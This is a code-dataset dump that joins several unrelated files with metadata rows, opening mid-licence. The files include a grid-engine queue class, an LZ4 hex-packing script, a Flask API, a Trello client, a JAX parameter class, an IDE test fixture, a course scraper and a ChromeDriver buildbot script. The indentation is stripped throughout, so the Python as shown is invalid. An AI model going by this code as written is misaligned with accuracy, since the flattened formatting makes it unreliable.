# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################################
# ___INFO__MARK_END__
#
from .qconf_object import QconfObject
class ClusterQueue(QconfObject):
""" This class encapsulates UGE cluster queue object. """
#: Object version.
VERSION = '1.0'
#: Object name key.
NAME_KEY = 'qname'
#: Object keys that must be provided by user.
USER_PROVIDED_KEYS = ['qname']
#: Default values for required data keys.
REQUIRED_DATA_DEFAULTS = {
'hostlist': None,
'seq_no': 0,
'load_thresholds': 'np_load_avg=1.75',
'suspend_thresholds': None,
'nsuspend': 1,
'suspend_interval': '00:05:00',
'priority': 0,
'min_cpu_interval': '00:05:00',
'qtype': 'BATCH INTERACTIVE',
'ckpt_list': None,
'pe_list': 'make',
'jc_list': ['NO_JC', 'ANY_JC'],
'rerun': False,
'slots': 1,
'tmpdir': '/tmp',
'shell': '/bin/sh',
'prolog': None,
'epilog': None,
'shell_start_mode': 'unix_behavior',
'starter_method': None,
'suspend_method': None,
'resume_method': None,
'terminate_method': None,
'notify': '00:00:60',
'owner_list': None,
'user_lists': None,
'xuser_lists': None,
'subordinate_list': None,
'complex_values': None,
'projects': None,
'xprojects': None,
'calendar': None,
'initial_state': 'default',
's_rt': float('inf'),
'h_rt': float('inf'),
'd_rt': float('inf'),
's_cpu': float('inf'),
'h_cpu': float('inf'),
's_fsize': float('inf'),
'h_fsize': float('inf'),
's_data': float('inf'),
'h_data': float('inf'),
's_stack': float('inf'),
'h_stack': float('inf'),
's_core': float('inf'),
'h_core': float('inf'),
's_rss': float('inf'),
'h_rss': float('inf'),
's_vmem': float('inf'),
'h_vmem': float('inf')
}
INT_KEY_MAP = QconfObject.get_int_key_map(REQUIRED_DATA_DEFAULTS)
FLOAT_KEY_MAP = QconfObject.get_float_key_map(REQUIRED_DATA_DEFAULTS)
DEFAULT_LIST_DELIMITER = ','
LIST_KEY_MAP = {
'slots': ',',
'load_thresholds': ',',
'suspend_thresholds': ',',
'ckpt_list': ',',
'pe_list': ',',
'jc_list': ',',
'owner_list': ',',
'user_lists': ',',
'xuser_lists': ',',
'subordinate_list': ',',
'complex_values': ',',
'projects': ',',
'xprojects': ',',
}
def __init__(self, name=None, data=None, metadata=None, json_string=None):
"""
Class constructor.
:param name: Queue name. If provided, it will override queue name from data or JSON string parameters ('qname' key).
:type name: str
:param data: Queue data. If provided, it will override corresponding data from queue JSON string representation.
:type data: dict
:param metadata: Queue metadata. If provided, it will override corresponding metadata from queue JSON string representation.
:type metadata: dict
:param json_string: Queue JSON string representation.
:type json_string: str
:raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not contain dictionary representing a ClusterQueue object.
"""
QconfObject.__init__(self, name=name, data=data, metadata=metadata, json_string=json_string)
| 33.484615
| 172
| 0.574546
| 3,426
| 0.787043
| 0
| 0
| 0
| 0
| 0
| 0
| 2,786
| 0.640018
|
b70d6fb35471bf494fd9d6d6d9ddbd3c3ad564bf
| 6,789
|
py
|
Python
|
decomplz4l_prep/__init__.py
|
Tiempogithub/decomplz4l
|
1043daf70072bb4dc229c7503bce3b212156921b
|
[
"BSD-3-Clause"
] | 1
|
2020-02-28T16:21:00.000Z
|
2020-02-28T16:21:00.000Z
|
decomplz4l_prep/__init__.py
|
Tiempogithub/decomplz4l
|
1043daf70072bb4dc229c7503bce3b212156921b
|
[
"BSD-3-Clause"
] | null | null | null |
decomplz4l_prep/__init__.py
|
Tiempogithub/decomplz4l
|
1043daf70072bb4dc229c7503bce3b212156921b
|
[
"BSD-3-Clause"
] | 2
|
2019-06-28T21:36:01.000Z
|
2019-08-19T07:55:51.000Z
|
#!/usr/bin/env python3
import os
import sys
import runpy
from intelhex import IntelHex
#import lz4.frame
import subprocess
import shutil
def get_section_from_elf(elf,section_name):
objdump = shutil.which('objdump')
cmd = [ objdump,elf,'-h','--section='+section_name]
out=""
res=subprocess.run(cmd, stdout=subprocess.PIPE, check=True)
out = res.stdout
fields = out.splitlines()[5].split()
size=int("0x"+fields[2].decode("utf-8") ,0)
run=int("0x"+fields[3].decode("utf-8") ,0)
load=int("0x"+fields[4].decode("utf-8") ,0)
return {'load':load,'run':run,'size':size}
def bytes_length(x):
return (x.bit_length() + 7) // 8
if __name__ == "__main__":
script_directory = os.path.dirname(os.path.realpath(__file__))
lz4 = os.path.join(script_directory,'lz4')
if not os.path.isfile(lz4):
lz4 = shutil.which('lz4')
assert(lz4 is not None)
if (len(sys.argv) > 3) | (len(sys.argv) < 3) :
print("ERROR: incorrect arguments")
print("Usage:")
print("prep.py <ihex> <metainfo>")
exit()
ihexf = sys.argv[1]
metainfof = sys.argv[2]
ih = IntelHex()
ihgu = IntelHex()
ih.loadhex(ihexf)
all_sections = ih.segments()
print("input hex file sections:")
for sec in all_sections:
print("0x%08X 0x%08X"%(sec[0],sec[1]-1))
file_globals = runpy.run_path(metainfof,init_globals={'prep_path':os.path.dirname(script_directory)})
comp_storage_start=file_globals["comp_storage"]['start']
comp_storage_end=file_globals["comp_storage"]['end']
map_load_size=file_globals["map_load_size"]
map_run_size=file_globals["map_run_size"]
grow_up=file_globals["grow_up"]
comp_sections=file_globals["comp_sections"]
def get_file_global(name,default_value=None):
if name in file_globals:
out=file_globals[name]
else:
out=default_value
return out
linear_mode=get_file_global("linear_mode",True)
start_at_end=get_file_global("start_at_end",False)
use_seg_as_linear=get_file_global("use_seg_as_linear",False)
print("%d sections to compress"%len(comp_sections))
for sec in comp_sections:
print("load: 0x%08X -> 0x%08X, run: 0x%08X -> 0x%08X, size: 0x%X"%(sec['load'],sec['load']+sec['size']-1,sec['run'],sec['run']+sec['size']-1,sec['size']))
mapsize = (map_load_size+map_run_size)*len(comp_sections)
map_storage=comp_storage_start
comp_storage=comp_storage_start+mapsize
#compress the sections
for sec in comp_sections:
#write the start address in the map LUT
start_offset_bytes = (comp_storage-comp_storage_start).to_bytes(8,byteorder='little')
for i in range(0,map_load_size):
ihgu[map_storage] = start_offset_bytes[i]
map_storage+=1
run_bytes = sec['run'].to_bytes(8,byteorder='little')
for i in range(0,map_run_size):
ihgu[map_storage] = run_bytes[i]
map_storage+=1
data = ih[sec['load']:sec['load']+sec['size']]
ba = bytearray()
for bi in range(sec['load'],sec['load']+sec['size']):
ba.append(ih[bi])
newfile=open('lz4_input.bin','wb')
newfile.write(ba)
newfile.close()
cmd = [ lz4,'-9','-l','-f','lz4_input.bin','lz4_output.bin']
subprocess.run(cmd,check=True)
size=0
with open('lz4_output.bin', "rb") as f:
#skip the frame descriptor
frame_descriptor = f.read(4)
byte = f.read(1)
while byte:
ihgu[comp_storage] = int.from_bytes( byte, byteorder='little', signed=False )
comp_storage+=1
size+=1
byte = f.read(1)
sec['comp_size']=size
if comp_storage>comp_storage_end:
print("ERROR: compressed storage overflow by %d"%(comp_storage - comp_storage_end))
exit(1)
else:
used = comp_storage - comp_storage_start
free = comp_storage_end+1-comp_storage
print("0x%08x bytes used in compressed storage"%(used))
print("0x%08x bytes free in compressed storage"%(free))
comp_storage_pad=0
if grow_up:
#just rename ihex object
iho = ihgu
else:
#reverse compressed area storage
iho = IntelHex()
map_storage=comp_storage_end+1
#if 0!=(free%16):
# comp_storage_pad = free%16
# free-=comp_storage_pad
comp_storage=comp_storage_start+free
if 0!=(comp_storage%16):
#add padding data
for i in range(comp_storage-(comp_storage%16),comp_storage):
iho[i]=0x55
#move the compressed data up
print("copy 0x%X bytes from 0x%08X to 0x%08X"%(used,comp_storage_start+mapsize,comp_storage_start+free))
for i in range(0,used):
iho[comp_storage_start+free+i] = ihgu[comp_storage_start+mapsize+i]
#rebuild map
for sec in comp_sections:
sec['load']=comp_storage
#write the start offset in the map LUT
map_storage-=map_load_size+map_run_size
start_offset_bytes = (comp_storage-comp_storage_start).to_bytes(8,byteorder='little')
for i in range(0,map_load_size):
iho[map_storage] = start_offset_bytes[i]
map_storage+=1
run_bytes = sec['run'].to_bytes(8,byteorder='little')
for i in range(0,map_run_size):
iho[map_storage] = run_bytes[i]
map_storage+=1
map_storage-=map_load_size+map_run_size
comp_storage+=sec['comp_size']
#print("0x%x"%comp_storage)
#print("0x%x"%map_storage)
assert(map_storage==comp_storage+comp_storage_pad)
#create a list of start address of the sections which have been compressed
print("compressed sections load addresses:")
comp_sections_start=[]
for sec in comp_sections:
print("0x%08X"%sec['load'])
comp_sections_start.append(sec['load'])
#copy all regular sections
for sec in all_sections:
print("copy section from %x to %x"%(sec[0],sec[1]))
for i in range(sec[0],sec[1]):
if (i<comp_storage_start) or (i>=comp_storage_end):
iho[i]=ih[i]
#copy start address
#print("start address: ",ih.start_addr)
iho.start_addr = ih.start_addr
if not linear_mode or start_at_end or use_seg_as_linear:
#need custom version of intelhex, get it here: https://github.com/sebastien-riou/intelhex
iho.write_hex_file(ihexf+".lz4l.ihex",linear_mode=linear_mode,start_at_end=start_at_end,use_seg_as_linear=use_seg_as_linear)
else:
iho.write_hex_file(ihexf+".lz4l.ihex")
| 37.098361
| 162
| 0.627338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,595
| 0.234939
|
b70e5693b800019c043a966f67e793acac17d9e5
| 3,819
|
py
|
Python
|
application/views/service/service.py
|
celerysoft/scholar-tool-manager
|
6188d981266eeec391ba646b9c7dc426ddec37e8
|
[
"Apache-2.0"
] | null | null | null |
application/views/service/service.py
|
celerysoft/scholar-tool-manager
|
6188d981266eeec391ba646b9c7dc426ddec37e8
|
[
"Apache-2.0"
] | 3
|
2019-04-29T22:55:49.000Z
|
2020-05-14T14:35:42.000Z
|
application/views/service/service.py
|
celerysoft/ScholarToolManager
|
6188d981266eeec391ba646b9c7dc426ddec37e8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import make_response, Blueprint
from app import derive_import_root, add_url_rules_for_blueprint
from application import exception
from application.model.service import Service
from application.model.service_template import ServiceTemplate
from application.util.database import session_scope
from application.views.base_api import BaseNeedLoginAPI, ApiResult
class ServiceAPI(BaseNeedLoginAPI):
methods = ['GET', 'PATCH']
def get(self):
service_uuid = self.get_data('uuid')
if self.valid_data(service_uuid):
return self.get_service_by_uuid(service_uuid)
else:
return self.get_user_services(self.user_uuid)
def get_user_services(self, user_uuid):
with session_scope() as db_session:
query = db_session.query(Service, ServiceTemplate.title) \
.outerjoin(ServiceTemplate, Service.template_uuid == ServiceTemplate.uuid) \
.filter(Service.user_uuid == user_uuid) \
.filter(Service.status != Service.STATUS.DELETED) \
.order_by(Service.created_at)
page, page_size, offset, max_page = self._derive_page_parameter(query.count())
services = query.offset(offset).limit(page_size).all()
service_list = []
for record in services:
service = record.Service
service_dict = service.to_dict()
service_dict['title'] = record.title
service_list.append(service_dict)
result = ApiResult('获取用户学术服务信息成功', payload={
'page': page,
'page_size': page_size,
'max_page': max_page,
'services': service_list
})
return result.to_response()
def get_service_by_uuid(self, service_uuid):
with session_scope() as session:
service = session.query(Service).filter(Service.uuid == service_uuid,
Service.status != Service.STATUS.DELETED).first()
if service is None:
raise exception.api.NotFound('套餐不存在')
if service.user_uuid != self.user_uuid:
raise exception.api.Forbidden('无权查看其他用户的套餐信息')
template = session.query(ServiceTemplate) \
.filter(ServiceTemplate.uuid == service.template_uuid).first()
service_dict = service.to_dict()
service_dict['title'] = template.title
service_dict['price'] = float(template.price)
result = ApiResult('获取学术服务详情成功', payload={
'service': service_dict
})
return make_response(result.to_response())
def patch(self):
with session_scope() as session:
uuid = self.get_post_data('uuid', require=True, error_message='缺少uuid字段')
service = session.query(Service).filter(Service.uuid == uuid).first()
if service is None:
raise exception.api.NotFound('学术服务不存在')
if service.user_uuid != self.user_uuid:
raise exception.api.Forbidden('无权修改其他用户的学术服务')
auto_renew = self.get_post_data('auto_renew')
if self.valid_data(auto_renew):
self.patch_service_auto_renew(service)
result = ApiResult('修改套餐成功', 201)
return result.to_response()
@staticmethod
def patch_service_auto_renew(service: Service):
if service.type == service.TYPE.MONTHLY:
latter_auto_renew_status = 1 if service.auto_renew == 0 else 0
service.auto_renew = latter_auto_renew_status
view = ServiceAPI
bp = Blueprint(__name__.split('.')[-1], __name__)
root = derive_import_root(__name__)
add_url_rules_for_blueprint(root, bp)
| 38.19
| 101
| 0.625556
| 3,417
| 0.863097
| 0
| 0
| 247
| 0.062389
| 0
| 0
| 359
| 0.090679
|
b713985ca32368cb00dff148dea34d4486a5b5ad
| 1,293
|
py
|
Python
|
trello/searchs.py
|
fif911/trello3_little_bit_updated
|
baf0275c5a89b3bcf9c1544897cbe25fafbc53d0
|
[
"BSD-2-Clause"
] | 16
|
2016-01-19T17:02:24.000Z
|
2020-02-20T19:23:32.000Z
|
trello/searchs.py
|
fif911/trello3_little_bit_updated
|
baf0275c5a89b3bcf9c1544897cbe25fafbc53d0
|
[
"BSD-2-Clause"
] | 3
|
2016-02-10T14:17:58.000Z
|
2016-07-26T01:31:54.000Z
|
trello/searchs.py
|
fif911/trello3_little_bit_updated
|
baf0275c5a89b3bcf9c1544897cbe25fafbc53d0
|
[
"BSD-2-Clause"
] | 7
|
2016-02-09T23:47:00.000Z
|
2021-06-05T17:03:22.000Z
|
import json
import requests
class Searchs(object):
__module__ = 'trello'
def __init__(self, apikey, token=None):
self._apikey = apikey
self._token = token
def get(self, query, idOrganizations, idBoards=None, idCards=None, modelTypes=None, board_fields=None, boards_limit=None, card_fields=None, cards_limit=None, card_board=None, card_list=None, card_members=None, organization_fields=None, organizations_limit=None, member_fields=None, members_limit=None, action_fields=None, actions_limit=None, actions_since=None, partial=None):
resp = requests.get("https://trello.com/1/search" % (), params=dict(key=self._apikey, token=self._token, query=query, idOrganizations=idOrganizations, idBoards=idBoards, idCards=idCards, modelTypes=modelTypes, board_fields=board_fields, boards_limit=boards_limit, card_fields=card_fields, cards_limit=cards_limit, card_board=card_board, card_list=card_list, card_members=card_members, organization_fields=organization_fields, organizations_limit=organizations_limit, member_fields=member_fields, members_limit=members_limit, action_fields=action_fields, actions_limit=actions_limit, actions_since=actions_since, partial=partial), data=None)
resp.raise_for_status()
return resp.json()
| 76.058824
| 649
| 0.784996
| 1,251
| 0.967517
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.028616
|
b713b15110cb69ba0de9387f17cdd3a78231774b
| 3,736
|
py
|
Python
|
architect/design/bounded_exogenous_parameters.py
|
MIT-REALM/architect
|
1b5bbf6ddf08146cd3b8ad5c058539ac140e9ebb
|
[
"BSD-2-Clause"
] | 2
|
2022-03-30T03:07:26.000Z
|
2022-03-30T17:35:21.000Z
|
architect/design/bounded_exogenous_parameters.py
|
MIT-REALM/architect
|
1b5bbf6ddf08146cd3b8ad5c058539ac140e9ebb
|
[
"BSD-2-Clause"
] | null | null | null |
architect/design/bounded_exogenous_parameters.py
|
MIT-REALM/architect
|
1b5bbf6ddf08146cd3b8ad5c058539ac140e9ebb
|
[
"BSD-2-Clause"
] | null | null | null |
"""Exogenous parameters are anything "uncontrollable" that affect the design; these are
what we consider robustness against and are typically drawn from some distribution
"""
from typing import Optional, Sequence, Tuple, Union
import jax
import jax.numpy as jnp
from jax._src.prng import PRNGKeyArray
import numpy as np
from .exogenous_parameters import ExogenousParameters
class BoundedExogenousParameters(ExogenousParameters):
"""A subclass of ExogenousParameters that includes hyperrectangle bounds for each
dimension.
"""
def __init__(
self,
size: int,
bounds: jnp.ndarray,
names: Optional[list[str]] = None,
):
"""
Initialize the ExogenousParameters object.
args:
size: the number of design variables
bounds: a (size, 2) array of upper and lower bounds for each parameter.
names: a list of names for variables. If not provided, defaults to
"phi_0", "phi_1", ...
"""
super(BoundedExogenousParameters, self).__init__(size, names)
self.bounds = bounds
# Bounded exogenous parameters can have specific values
self._values = jnp.zeros(self.size)
for idx, bound in enumerate(self.bounds_list):
lb, ub = bound
if lb is not None and ub is not None:
center = (lb + ub) / 2.0
elif lb is not None:
center = lb
elif ub is not None:
center = ub
else:
center = 0.0
self._values = self._values.at[idx].set(center)
def set_values(self, new_values: Union[jnp.ndarray, np.ndarray]):
"""Set the values of these design parameters using the given values.
args:
new_values: the array of new values
"""
self._values = new_values
def get_values(self) -> jnp.ndarray:
"""Return the values of these design parameters."""
return self._values
def get_values_np(self) -> np.ndarray:
"""Return the values of these design parameters."""
return np.array(self._values)
@property
def bounds_list(self) -> Sequence[Tuple[float, float]]:
"""Returns the bounds on the design parameters as a list. Each element
of the list should be a tuple of (lower, upper) bounds.
"""
return [(lb.item(), ub.item()) for lb, ub in self.bounds]
def sample(
self, prng_key: PRNGKeyArray, batch_size: Optional[int] = None
) -> jnp.ndarray:
"""Sample values for these exogenous parameters uniformly from the bounded
region
args:
prng_key: a 2-element JAX array containing the PRNG key used for sampling.
This method will not split the key, it will be consumed.
batch_size: if None (default), return a 1D JAX array with self.size
elements; otherwise, return a 2D JAX array with size
(batch_size, self.size)
"""
# Handle default if no batch size is given
if batch_size is None:
batch_size = 1
shape: Tuple[int, ...] = (batch_size, self.size)
# Sample uniformly on [0, 1), then re-scale and shift to satisfy bounds
sample = jax.random.uniform(prng_key, shape=shape, minval=0, maxval=1)
for dim_idx in range(self.size):
lower, upper = self.bounds[dim_idx]
spread = upper - lower
sample = sample.at[:, dim_idx].set(sample[:, dim_idx] * spread + lower)
# Squeeze to 1 dimension if batch_size is 1
if batch_size == 1:
sample = sample.reshape(-1)
return sample
| 35.580952
| 87
| 0.608405
| 3,357
| 0.898555
| 0
| 0
| 290
| 0.077623
| 0
| 0
| 1,701
| 0.4553
|
b7150935db3a2cd174419b41f2e68609597221e8
| 103
|
py
|
Python
|
python/testData/quickdoc/AncestorClassDocstringForConstructor.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/quickdoc/AncestorClassDocstringForConstructor.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/quickdoc/AncestorClassDocstringForConstructor.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
class Base:
"""Class docstring."""
class Sub(Base):
def __in<the_ref>it__(self):
pass
| 14.714286
| 32
| 0.592233
| 100
| 0.970874
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.213592
|
b7176f2e0dac30c4e5404b6399ccd7f4159c21b1
| 4,955
|
py
|
Python
|
courspider/department_calendar.py
|
Zylphrex/courspider
|
bbcd8f71afa3958405f7017890d5fc9ec8d0d4cd
|
[
"MIT"
] | null | null | null |
courspider/department_calendar.py
|
Zylphrex/courspider
|
bbcd8f71afa3958405f7017890d5fc9ec8d0d4cd
|
[
"MIT"
] | null | null | null |
courspider/department_calendar.py
|
Zylphrex/courspider
|
bbcd8f71afa3958405f7017890d5fc9ec8d0d4cd
|
[
"MIT"
] | null | null | null |
import re
from courspider.faculty_calendar_resources.department import Department
from courspider.faculty_calendar_resources.url import URL
from courspider.course import Course
class DepartmentCalendar:
def __init__(self, session, url):
"""
Initialize a new Department Calendar for the given url
:param session: The session of the calendar
:type session: Session
:param url: The url to the specified year's calendar
:type url: URL
"""
self.session = session
self.url = url
self.department = DepartmentCalendar.find_department_name(url)
self.courses = []
# regex used for the _find_department method
_department_name = re.compile(r"<h1>(.*)<\/h1>")
@staticmethod
def find_department_name(url):
"""
Return the Department found at the given url
:param url: The url of the department.
:type url: URL
:return: The Department
:rtype: Department
"""
matches = DepartmentCalendar._department_name.\
findall(url.raw_html)
# only a single h1 tag in the html, and it is the department name
return Department(matches[0])
# please don't touch this regular expression without fully understanding it
# it has been adjusted after many iterations after finding strange
# formatting in the raw html, so any changes is not advised
# regular expression used to filter out the course data
regex = r'<a name="([A-Z]{3}\d\d\d[A-Z]\d)"><\/a><span class="strong">\1\s*(.*?)<\/span>(\s*<div>)?\s*(<\/p>)?\s*<\/?(p|div)(.*?)?>(.*?)<\/?(p|div)>(\s*<\/div>)?\s*(<p>)?(\s*<(p|div)>(.*?)<\/(p|div)>)?(\s*<(p|div)>(.*?)<\/(p|div)>)?\s*(<p>)?\s*(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?\s*(Distribution Requirement Status:\s*(.*?)\s*)?(<br>)?\s*(Breadth Requirement:\s*(.*?)\s*)?(<br>|<\/?p>)'
_course = re.compile(regex, re.DOTALL)
def get_courses(self):
"""
Returns a list of all the courses in this Department Calendar.
:return: list of all courses in this DepartmentCalendar
:rtype: list[Course]
"""
# if the list has been generated
if self.courses:
return self.courses
# generate list if necessary
courses_data = DepartmentCalendar._course.findall(self.url.raw_html)
for course_data in courses_data:
self.courses.append(self._create_course(course_data))
return self.courses.copy()
def _create_course(self, data):
"""
Create a course object from the data extracted using the above regex
:param data: The data extracted using the above regex
:type data: tuple(str, ...)
:return: A course object
:rtype: Course
"""
# these numbers come from the group numbers from the regex above
# '_course' count them if you wanna
course_code = DepartmentCalendar._erase_html(data[0])
course_name = DepartmentCalendar._erase_html(data[1])
course_description = DepartmentCalendar._erase_html(
data[6] + data[11] + data[15])
exclusion = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 20))
prerequisite = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 21))
corequisite = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 22))
recommended = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 23))
distribution_requirement = DepartmentCalendar._erase_html(
data[44])
breath_requirement = DepartmentCalendar._erase_html(data[47])
print("found course: {}".format(course_code))
return Course(course_code, course_name, course_description,
exclusion, prerequisite, corequisite, recommended,
distribution_requirement, breath_requirement,
self.department)
def _select_data(data, start):
result = ""
for i in range(4):
result += data[start + i * 6]
return result
_tags = re.compile('<.*?>', re.DOTALL)
@staticmethod
def _erase_html(data):
"""
Erases any remaining html tags in the text.
:param data: The raw data
:type data: str
:return: The data after removing remaining html tags
:rtype: str
"""
return DepartmentCalendar._tags.sub('', data)
| 40.284553
| 795
| 0.618365
| 4,775
| 0.963673
| 0
| 0
| 772
| 0.155802
| 0
| 0
| 2,430
| 0.490414
|
b7187d387790af8d5795d75e9899699ce907f9df
| 6,366
|
py
|
Python
|
chrome/test/chromedriver/run_buildbot_steps.py
|
devasia1000/chromium
|
919a8a666862fb866a6bb7aa7f3ae8c0442b4828
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-02-03T05:19:48.000Z
|
2021-11-15T15:07:21.000Z
|
chrome/test/chromedriver/run_buildbot_steps.py
|
devasia1000/chromium
|
919a8a666862fb866a6bb7aa7f3ae8c0442b4828
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/test/chromedriver/run_buildbot_steps.py
|
devasia1000/chromium
|
919a8a666862fb866a6bb7aa7f3ae8c0442b4828
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs all the buildbot steps for ChromeDriver except for update/compile."""
import optparse
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import time
import urllib2
import zipfile
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(_THIS_DIR, os.pardir, 'pylib'))
from common import chrome_paths
from common import util
import archive
GS_BUCKET = 'gs://chromedriver-prebuilts'
GS_ZIP_PREFIX = 'chromedriver2_prebuilts'
SLAVE_SCRIPT_DIR = os.path.join(_THIS_DIR, os.pardir, os.pardir, os.pardir,
os.pardir, os.pardir, os.pardir, os.pardir,
'scripts', 'slave')
UPLOAD_SCRIPT = os.path.join(SLAVE_SCRIPT_DIR, 'skia', 'upload_to_bucket.py')
DOWNLOAD_SCRIPT = os.path.join(SLAVE_SCRIPT_DIR, 'gsutil_download.py')
def Archive(revision):
print '@@@BUILD_STEP archive@@@'
prebuilts = ['libchromedriver2.so', 'chromedriver2_server',
'chromedriver2_unittests', 'chromedriver2_tests']
build_dir = chrome_paths.GetBuildDir(prebuilts[0:1])
zip_name = '%s_r%s.zip' % (GS_ZIP_PREFIX, revision)
temp_dir = util.MakeTempDir()
zip_path = os.path.join(temp_dir, zip_name)
print 'Zipping prebuilts %s' % zip_path
f = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)
for prebuilt in prebuilts:
f.write(os.path.join(build_dir, prebuilt), prebuilt)
f.close()
cmd = [
sys.executable,
UPLOAD_SCRIPT,
'--source_filepath=%s' % zip_path,
'--dest_gsbase=%s' % GS_BUCKET
]
if util.RunCommand(cmd):
print '@@@STEP_FAILURE@@@'
def Download():
print '@@@BUILD_STEP Download chromedriver prebuilts@@@'
temp_dir = util.MakeTempDir()
zip_path = os.path.join(temp_dir, 'chromedriver2_prebuilts.zip')
cmd = [
sys.executable,
DOWNLOAD_SCRIPT,
'--url=%s' % GS_BUCKET,
'--partial-name=%s' % GS_ZIP_PREFIX,
'--dst=%s' % zip_path
]
if util.RunCommand(cmd):
print '@@@STEP_FAILURE@@@'
build_dir = chrome_paths.GetBuildDir(['host_forwarder'])
print 'Unzipping prebuilts %s to %s' % (zip_path, build_dir)
f = zipfile.ZipFile(zip_path, 'r')
f.extractall(build_dir)
f.close()
# Workaround for Python bug: http://bugs.python.org/issue15795
os.chmod(os.path.join(build_dir, 'chromedriver2_server'), 0700)
def MaybeRelease(revision):
# Version is embedded as: const char kChromeDriverVersion[] = "0.1";
with open(os.path.join(_THIS_DIR, 'chrome', 'version.cc'), 'r') as f:
version_line = filter(lambda x: 'kChromeDriverVersion' in x, f.readlines())
version = version_line[0].split('"')[1]
bitness = '32'
if util.IsLinux() and platform.architecture()[0] == '64bit':
bitness = '64'
zip_name = 'chromedriver2_%s%s_%s.zip' % (
util.GetPlatformName(), bitness, version)
site = 'https://code.google.com/p/chromedriver/downloads/list'
s = urllib2.urlopen(site)
downloads = s.read()
s.close()
if zip_name in downloads:
return 0
print '@@@BUILD_STEP releasing %s@@@' % zip_name
if util.IsWindows():
server_orig_name = 'chromedriver2_server.exe'
server_name = 'chromedriver.exe'
else:
server_orig_name = 'chromedriver2_server'
server_name = 'chromedriver'
server = os.path.join(chrome_paths.GetBuildDir([server_orig_name]),
server_orig_name)
print 'Zipping ChromeDriver server', server
temp_dir = util.MakeTempDir()
zip_path = os.path.join(temp_dir, zip_name)
f = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)
f.write(server, server_name)
if util.IsLinux() or util.IsMac():
adb_commands = os.path.join(_THIS_DIR, 'chrome', 'adb_commands.py')
f.write(adb_commands, 'adb_commands.py')
f.close()
cmd = [
sys.executable,
os.path.join(_THIS_DIR, 'third_party', 'googlecode',
'googlecode_upload.py'),
'--summary', 'version of ChromeDriver2 r%s' % revision,
'--project', 'chromedriver',
'--user', 'chromedriver.bot@gmail.com',
'--label', 'Release',
zip_path
]
with open(os.devnull, 'wb') as no_output:
if subprocess.Popen(cmd, stdout=no_output, stderr=no_output).wait():
print '@@@STEP_FAILURE@@@'
def KillChromes():
chrome_map = {
'win': 'chrome.exe',
'mac': 'Chromium',
'linux': 'chrome',
}
if util.IsWindows():
cmd = ['taskkill', '/F', '/IM']
else:
cmd = ['killall', '-9']
cmd.append(chrome_map[util.GetPlatformName()])
util.RunCommand(cmd)
def CleanTmpDir():
tmp_dir = tempfile.gettempdir()
print 'cleaning temp directory:', tmp_dir
for file_name in os.listdir(tmp_dir):
if os.path.isdir(os.path.join(tmp_dir, file_name)):
print 'deleting sub-directory', file_name
shutil.rmtree(os.path.join(tmp_dir, file_name), True)
def WaitForLatestSnapshot(revision):
print '@@@BUILD_STEP wait_for_snapshot@@@'
while True:
snapshot_revision = archive.GetLatestRevision(archive.Site.SNAPSHOT)
if snapshot_revision >= revision:
break
print 'Waiting for snapshot >= %s, found %s' % (revision, snapshot_revision)
time.sleep(60)
print 'Got snapshot revision', snapshot_revision
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--android-package',
help='Application package name, if running tests on Android.')
parser.add_option(
'-r', '--revision', type='string', default=None,
help='Chromium revision')
options, _ = parser.parse_args()
if not options.android_package:
KillChromes()
CleanTmpDir()
if options.android_package:
Download()
else:
if not options.revision:
parser.error('Must supply a --revision')
if util.IsLinux() and platform.architecture()[0] == '64bit':
Archive(options.revision)
WaitForLatestSnapshot(options.revision)
cmd = [
sys.executable,
os.path.join(_THIS_DIR, 'run_all_tests.py'),
]
if options.android_package:
cmd.append('--android-package=' + options.android_package)
passed = (util.RunCommand(cmd) == 0)
if not options.android_package and passed:
MaybeRelease(options.revision)
if __name__ == '__main__':
main()
| 29.887324
| 80
| 0.678291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,884
| 0.295947
|
